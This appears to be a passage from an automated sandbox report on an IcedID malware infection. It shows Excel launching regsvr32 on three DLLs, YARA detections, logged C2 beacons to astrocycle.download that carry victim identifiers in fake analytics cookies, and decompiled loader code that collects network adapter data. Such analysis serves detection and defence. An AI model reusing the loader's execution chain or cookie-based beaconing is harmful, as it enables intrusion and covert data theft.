                                                                                                                                                                                              alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                              Data Raw: 31 31 31 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 73 74 72 6f 63 79 63 6c 65 2e 64 6f 77 6e 6c 6f 61 64 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                              Data Ascii: 111<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at astrocycle.download Port 80</address></body></html>
                                                                                                                                                                                              Jul 6, 2021 15:07:27.874545097 CEST446INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                              4192.168.2.2249173172.67.213.11580C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                              Jul 6, 2021 15:07:31.204788923 CEST704OUTGET / HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Cookie: __gads=3565085024:1:7084:53; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=313739363035:416C627573:39463142354243374539333138353931; __io=0; _gid=67AFEDC5AC03
                                                                                                                                                                                              Host: astrocycle.download
                                                                                                                                                                                              Jul 6, 2021 15:07:31.738668919 CEST705INHTTP/1.1 404 Not Found
                                                                                                                                                                                              Date: Tue, 06 Jul 2021 13:07:31 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=zqsoB%2BQBjUhEGt5%2B7tJWBRIv65nP%2B8RLY4VBWICRx6EGgR6gVlTKfKKTZ8Hxf%2FWleXeVdN%2F8hTAmbWk9MO6JBlUMkCM2lHs9Lci7Np0uqxGaBu%2FelEupxOBUbfJRkoMBsw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                              NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 66a90e783ef2dffb-FRA
                                                                                                                                                                                              alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                              Data Raw: 31 31 31 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 73 74 72 6f 63 79 63 6c 65 2e 64 6f 77 6e 6c 6f 61 64 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                              Data Ascii: 111<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at astrocycle.download Port 80</address></body></html>
                                                                                                                                                                                              Jul 6, 2021 15:07:31.738708973 CEST705INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                              5192.168.2.2249175104.21.37.20980C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                              Jul 6, 2021 15:07:34.698215961 CEST964OUTGET / HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Cookie: __gads=3565085024:1:7088:53; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=313739363035:416C627573:37454443394536333630373541353235; __io=0; _gid=67AFEDC5AC03
                                                                                                                                                                                              Host: astrocycle.download
                                                                                                                                                                                              Jul 6, 2021 15:07:35.427088022 CEST965INHTTP/1.1 404 Not Found
                                                                                                                                                                                              Date: Tue, 06 Jul 2021 13:07:35 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=V0j5jRp1Xa598I%2F2xwRpfWsRKAhQ1r6yE6KBvuez42GwH3otQMVwOH%2F50FnO3S6gF0B94X5qe%2FX06UGtyzvxRS%2BPQIW1kkRAFTol6TtjAlVz%2Fgw85Pj9g6IFhxankgiw6Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                              NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 66a90e8e08714e97-FRA
                                                                                                                                                                                              alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                              Data Raw: 31 31 31 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 73 74 72 6f 63 79 63 6c 65 2e 64 6f 77 6e 6c 6f 61 64 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                              Data Ascii: 111<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at astrocycle.download Port 80</address></body></html>
                                                                                                                                                                                              Jul 6, 2021 15:07:35.427238941 CEST965INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                              HTTPS Packets

                                                                                                                                                                                              TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                                              Jul 6, 2021 15:07:25.999757051 CEST13.224.92.73443192.168.2.2249170CN=aws.amazon.com CN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=USWed Sep 30 02:00:00 CEST 2020 Thu Oct 22 02:00:00 CEST 2015 Mon May 25 14:00:00 CEST 2015 Wed Sep 02 02:00:00 CEST 2009Thu Sep 23 14:00:00 CEST 2021 Sun Oct 19 02:00:00 CEST 2025 Thu Dec 31 02:00:00 CET 2037 Wed Jun 28 19:39:16 CEST 2034769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                                                                                                                                                              CN=Amazon, OU=Server CA 1B, O=Amazon, C=USCN=Amazon Root CA 1, O=Amazon, C=USThu Oct 22 02:00:00 CEST 2015Sun Oct 19 02:00:00 CEST 2025
                                                                                                                                                                                              CN=Amazon Root CA 1, O=Amazon, C=USCN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USMon May 25 14:00:00 CEST 2015Thu Dec 31 02:00:00 CET 2037
                                                                                                                                                                                              CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=USWed Sep 02 02:00:00 CEST 2009Wed Jun 28 19:39:16 CEST 2034
                                                                                                                                                                                              Jul 6, 2021 15:07:29.340223074 CEST13.224.92.73443192.168.2.2249172CN=aws.amazon.com CN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=USWed Sep 30 02:00:00 CEST 2020 Thu Oct 22 02:00:00 CEST 2015 Mon May 25 14:00:00 CEST 2015 Wed Sep 02 02:00:00 CEST 2009Thu Sep 23 14:00:00 CEST 2021 Sun Oct 19 02:00:00 CEST 2025 Thu Dec 31 02:00:00 CET 2037 Wed Jun 28 19:39:16 CEST 2034769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                                                                                                                                                              CN=Amazon, OU=Server CA 1B, O=Amazon, C=USCN=Amazon Root CA 1, O=Amazon, C=USThu Oct 22 02:00:00 CEST 2015Sun Oct 19 02:00:00 CEST 2025
                                                                                                                                                                                              CN=Amazon Root CA 1, O=Amazon, C=USCN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USMon May 25 14:00:00 CEST 2015Thu Dec 31 02:00:00 CET 2037
                                                                                                                                                                                              CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=USWed Sep 02 02:00:00 CEST 2009Wed Jun 28 19:39:16 CEST 2034
                                                                                                                                                                                              Jul 6, 2021 15:07:33.521882057 CEST13.224.92.73443192.168.2.2249174CN=aws.amazon.com CN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=USWed Sep 30 02:00:00 CEST 2020 Thu Oct 22 02:00:00 CEST 2015 Mon May 25 14:00:00 CEST 2015 Wed Sep 02 02:00:00 CEST 2009Thu Sep 23 14:00:00 CEST 2021 Sun Oct 19 02:00:00 CEST 2025 Thu Dec 31 02:00:00 CET 2037 Wed Jun 28 19:39:16 CEST 2034769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                                                                                                                                                              CN=Amazon, OU=Server CA 1B, O=Amazon, C=USCN=Amazon Root CA 1, O=Amazon, C=USThu Oct 22 02:00:00 CEST 2015Sun Oct 19 02:00:00 CEST 2025
                                                                                                                                                                                              CN=Amazon Root CA 1, O=Amazon, C=USCN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USMon May 25 14:00:00 CEST 2015Thu Dec 31 02:00:00 CET 2037
                                                                                                                                                                                              CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=USWed Sep 02 02:00:00 CEST 2009Wed Jun 28 19:39:16 CEST 2034

                                                                                                                                                                                              Code Manipulations

                                                                                                                                                                                              Statistics

                                                                                                                                                                                              CPU Usage

                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                              Memory Usage

                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                              High Level Behavior Distribution

                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                              Behavior

                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                              System Behavior

                                                                                                                                                                                              Analysis Process: EXCEL.EXE PID: 1296 Parent PID: 584

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:15:07:39
                                                                                                                                                                                              Start date:06/07/2021
                                                                                                                                                                                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                                              Imagebase:0x13f4d0000
                                                                                                                                                                                              File size:27641504 bytes
                                                                                                                                                                                              MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                              Chronological Activities

                                                                                                                                                                                              Analysis Process: regsvr32.exe PID: 3060 Parent PID: 1296

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:15:07:44
                                                                                                                                                                                              Start date:06/07/2021
                                                                                                                                                                                              Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:regsvr32 -silent ..\XRAY.dll
                                                                                                                                                                                              Imagebase:0xff3c0000
                                                                                                                                                                                              File size:19456 bytes
                                                                                                                                                                                              MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                              • Rule: MAL_IcedID_GZIP_LDR_202104, Description: 2021 initial Bokbot / Icedid loader for fake GZIP payloads, Source: 00000003.00000002.2101910318.0000000000290000.00000004.00000001.sdmp, Author: Thomas Barabosch, Telekom Security
                                                                                                                                                                                              • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000003.00000002.2101851829.00000000001FD000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                              Chronological Activities

                                                                                                                                                                                              Analysis Process: regsvr32.exe PID: 1920 Parent PID: 1296

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:15:07:47
                                                                                                                                                                                              Start date:06/07/2021
                                                                                                                                                                                              Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:regsvr32 -silent ..\XTOWN.dll
                                                                                                                                                                                              Imagebase:0xff3c0000
                                                                                                                                                                                              File size:19456 bytes
                                                                                                                                                                                              MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                              • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000004.00000002.2111691413.00000000003E7000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: MAL_IcedID_GZIP_LDR_202104, Description: 2021 initial Bokbot / Icedid loader for fake GZIP payloads, Source: 00000004.00000002.2109602309.0000000000110000.00000004.00000001.sdmp, Author: Thomas Barabosch, Telekom Security
                                                                                                                                                                                              • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000004.00000002.2111724951.0000000000407000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                              Chronological Activities

                                                                                                                                                                                              Analysis Process: regsvr32.exe PID: 2308 Parent PID: 1296

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:15:07:51
                                                                                                                                                                                              Start date:06/07/2021
                                                                                                                                                                                              Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:regsvr32 -silent ..\XZIBIT.dll
                                                                                                                                                                                              Imagebase:0xff3c0000
                                                                                                                                                                                              File size:19456 bytes
                                                                                                                                                                                              MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                              • Rule: MAL_IcedID_GZIP_LDR_202104, Description: 2021 initial Bokbot / Icedid loader for fake GZIP payloads, Source: 00000005.00000002.2116608760.0000000000110000.00000004.00000001.sdmp, Author: Thomas Barabosch, Telekom Security
                                                                                                                                                                                              • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000005.00000002.2117952085.00000000028A4000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000005.00000002.2116809079.0000000000467000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                              Chronological Activities

                                                                                                                                                                                              Disassembly

                                                                                                                                                                                              Code Analysis

                                                                                                                                                                                              Reset < >

                                                                                                                                                                                                Analysis Process: regsvr32.exe PID: 3060 Parent PID: 1296 regsvr32.exeCOMMON

                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                Function 020D27BC, Relevance: 3.1, APIs: 2, Instructions: 87COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 25%
                                                                                                                                                                                                			E020D27BC(long long __rbx, void* __rcx, signed long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
				void* __rdi;
				int _t23;
				void* _t24;
				void* _t27;
				intOrPtr _t35;
				void* _t36;
				intOrPtr* _t44;
				long long _t46;
				intOrPtr* _t48;
				intOrPtr* _t54;
				intOrPtr* _t62;
				signed long long _t64;
				long long* _t67;
				intOrPtr* _t69;
				void* _t77;
				void* _t78;
				struct HINSTANCE__* _t79;
				void* _t80;
				CHAR* _t82;
				char* _t83;

				_t64 = __rsi;
				_t46 = __rbx;
				_t44 = _t69;
				 *((long long*)(_t44 + 8)) = __rbx;
				 *((long long*)(_t44 + 0x18)) = __rbp;
				 *((long long*)(_t44 + 0x20)) = __rsi;
				_push(_t62);
				_t80 = __rcx;
				_t83 = L"; _gid=";
				 *(_t44 + 0x10) =  *(_t44 + 0x10) & 0;
				LoadLibraryA(_t82);
				GetProcAddress(_t79);
				_t67 = _t44;
				if(_t44 == 0) {
					L6:
					r9d = 1;
					_t23 = E020D2990(_t36, _t44, _t46, _t80, L"; _gid=", _t62, 0x20d70c4, _t77, _t78);
					L7:
					return _t23;
				}
				_t24 =  *_t67(); // executed
				if(_t24 == 0x6f && __rbx != 0) {
					GetProcessHeap();
					_t9 = _t64 + 8; // 0x8
					_t36 = _t9;
					HeapAlloc(??, ??, ??);
					_t62 = _t44;
					if(_t44 == 0) {
						goto L6;
					}
					_t54 = _t44; // executed
					_t27 =  *_t67(); // executed
					if(_t27 == 0) {
						_t48 = _t62;
						do {
							if( *((char*)(_t48 + 0x1c0)) != 0x30 ||  *((char*)(_t48 + 0x1c1)) != 0x2e) {
								_t35 =  *((intOrPtr*)(_t48 + 0x194));
								if(_t54 - 1 <= 7) {
									r9d = _t35;
									_t18 = _t48 + 0x198; // 0x198
									_t54 = _t80 + _t64 * 2;
									E020D2990(_t36, _t44, _t48, _t54, _t83, _t62, _t18, _t77, _t78);
									_t64 = _t64 + _t44;
									_t83 = ":";
								}
							}
							_t48 =  *_t48;
						} while (_t48 != 0);
						GetProcessHeap();
						_t36 = 0;
						_t23 = HeapFree(??, ??, ??);
						if(_t64 == 0) {
							goto L6;
						}
						goto L7;
					}
					GetProcessHeap();
					_t36 = 0;
					HeapFree(??, ??, ??);
				}
			}























                                                                                                                                                                                                0x020d27bc
                                                                                                                                                                                                0x020d27bc
                                                                                                                                                                                                0x020d27bc
                                                                                                                                                                                                0x020d27bf
                                                                                                                                                                                                0x020d27c3
                                                                                                                                                                                                0x020d27c7
                                                                                                                                                                                                0x020d27cb
                                                                                                                                                                                                0x020d27d4
                                                                                                                                                                                                0x020d27d7
                                                                                                                                                                                                0x020d27e7
                                                                                                                                                                                                0x020d27ea
                                                                                                                                                                                                0x020d27fa
                                                                                                                                                                                                0x020d2800
                                                                                                                                                                                                0x020d2806
                                                                                                                                                                                                0x020d285f
                                                                                                                                                                                                0x020d285f
                                                                                                                                                                                                0x020d2876
                                                                                                                                                                                                0x020d287b
                                                                                                                                                                                                0x020d2893
                                                                                                                                                                                                0x020d2893
                                                                                                                                                                                                0x020d280f
                                                                                                                                                                                                0x020d2814
                                                                                                                                                                                                0x020d281f
                                                                                                                                                                                                0x020d282c
                                                                                                                                                                                                0x020d282c
                                                                                                                                                                                                0x020d282f
                                                                                                                                                                                                0x020d2835
                                                                                                                                                                                                0x020d283b
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x020d2842
                                                                                                                                                                                                0x020d2845
                                                                                                                                                                                                0x020d2849
                                                                                                                                                                                                0x020d2894
                                                                                                                                                                                                0x020d2897
                                                                                                                                                                                                0x020d289e
                                                                                                                                                                                                0x020d28a9
                                                                                                                                                                                                0x020d28b5
                                                                                                                                                                                                0x020d28b7
                                                                                                                                                                                                0x020d28ba
                                                                                                                                                                                                0x020d28c1
                                                                                                                                                                                                0x020d28c8
                                                                                                                                                                                                0x020d28cd
                                                                                                                                                                                                0x020d28d0
                                                                                                                                                                                                0x020d28d0
                                                                                                                                                                                                0x020d28b5
                                                                                                                                                                                                0x020d28d7
                                                                                                                                                                                                0x020d28da
                                                                                                                                                                                                0x020d28df
                                                                                                                                                                                                0x020d28e8
                                                                                                                                                                                                0x020d28ed
                                                                                                                                                                                                0x020d28f6
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x020d28fc
                                                                                                                                                                                                0x020d284b
                                                                                                                                                                                                0x020d2854
                                                                                                                                                                                                0x020d2859
                                                                                                                                                                                                0x020d2859

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetAdaptersInfo.IPHLPAPI(?,?,00000000,020D2CFE,?,?,00000003,020D24A4), ref: 020D280F
                                                                                                                                                                                                • GetAdaptersInfo.IPHLPAPI(?,?,00000000,020D2CFE,?,?,00000003,020D24A4), ref: 020D2845
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000003.00000002.2102434980.00000000020D0000.00000040.00000001.sdmp, Offset: 020D0000, based on PE: true
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AdaptersInfo
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3177971545-0
                                                                                                                                                                                                • Opcode ID: fc699fa13e68b788d874d6a78f58e359039745370b383d3aa825a9febfb906a8
                                                                                                                                                                                                • Instruction ID: ce90ee1b4cdd34fe01d72ed3f479fe721de662d5e4ff316b1298d649409267bf
                                                                                                                                                                                                • Opcode Fuzzy Hash: fc699fa13e68b788d874d6a78f58e359039745370b383d3aa825a9febfb906a8
                                                                                                                                                                                                • Instruction Fuzzy Hash: C131B475703B809AEB16DBA1E8487997BA1FB45FD4F884125CE0D07B66EF38C189D300
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 020D1810, Relevance: 1.7, APIs: 1, Instructions: 198memoryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000003.00000002.2102434980.00000000020D0000.00000040.00000001.sdmp, Offset: 020D0000, based on PE: true
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                • Opcode ID: c3a72f5bfcfd91918b5e83c3bb15c180b6cc2b39742bdcf2d413e26ac2e8c0cf
                                                                                                                                                                                                • Instruction ID: 3dd131f6e17987a20a00db029caff2fa04089e43dd143b80f72bd45d82a359ba
                                                                                                                                                                                                • Opcode Fuzzy Hash: c3a72f5bfcfd91918b5e83c3bb15c180b6cc2b39742bdcf2d413e26ac2e8c0cf
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0B71D136302B8287EB65CFA6E844BA9BBE1FB48B98F448125DE4E53B54DF38C155C700
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 020D22DC, Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • LookupAccountNameW.ADVAPI32 ref: 020D233C
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000003.00000002.2102434980.00000000020D0000.00000040.00000001.sdmp, Offset: 020D0000, based on PE: true
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AccountLookupName
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1484870144-0
                                                                                                                                                                                                • Opcode ID: cafe0df7641921cb4b3b83197fca258bc474e661d5f4a52d45703bbf776aa30b
                                                                                                                                                                                                • Instruction ID: dfd17afd4dc01c4529ec7b3ab70d37169eb0578ca3a75b755c849f5c538e7a5c
                                                                                                                                                                                                • Opcode Fuzzy Hash: cafe0df7641921cb4b3b83197fca258bc474e661d5f4a52d45703bbf776aa30b
                                                                                                                                                                                                • Instruction Fuzzy Hash: F9317E72702B418AEB128FB5E88439D37E4EB48B88F984135DE4D57B1AEF38C149D350
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 020D1678, Relevance: 1.6, APIs: 1, Instructions: 77nativeCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • NtQuerySystemInformation.NTDLL(?,?,00000000,020D2CB1,?,?,00000003,020D24A4), ref: 020D16CB
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000003.00000002.2102434980.00000000020D0000.00000040.00000001.sdmp, Offset: 020D0000, based on PE: true
                                                                                                                                                                                                Similarity
